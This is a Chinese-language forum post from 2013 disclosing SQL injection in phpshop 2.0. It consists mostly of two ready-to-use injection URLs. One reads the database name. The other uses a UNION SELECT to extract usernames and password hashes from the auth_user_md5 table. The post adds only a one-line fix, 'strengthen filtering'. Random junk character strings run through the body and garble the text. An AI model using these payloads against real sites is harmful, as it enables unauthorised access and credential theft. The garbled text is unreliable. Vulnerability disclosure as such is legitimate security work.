找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2081|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability4 o( W! y* q. k! U
, d! b, ]' l6 p
作者 : By onestree
$ i$ J( z3 f8 V( X下载地址 : http://code.google.com/p/phpshop/downloads/list8 B' O; t, _) d
测试地址: windows 7 / ubuntu
$ ?: X7 v; M! u
4 ^3 t" A: a# J' ~9 E$ \; V
, ?6 a1 ^) r0 ?& q, eSQLi p0c:
( S* t  I- q* R: c/ a & `5 D3 |: J8 `' b' n1 H
==================
9 P! {0 R5 O5 T# {# b) V+ S! P
" v1 }. `1 l8 m- u( V2 N/ mhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
  N% h" S/ C* R1 G, y) \: Aunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
2 d; T0 ~2 T$ W , R1 ?0 N' e  p" v) i6 g; ^+ J
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--; Q! p- P; A" h$ J- A1 {: m  ^8 M
' h- ?  f% _0 K$ z# X- e
修复:
/ o, M. p  c- T加强过滤" g( `  h. O6 C" G

3 h( [7 ^" ~3 v* u, C* L4 L# Q" O1 v  p/ b4 N3 l* h; R; I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表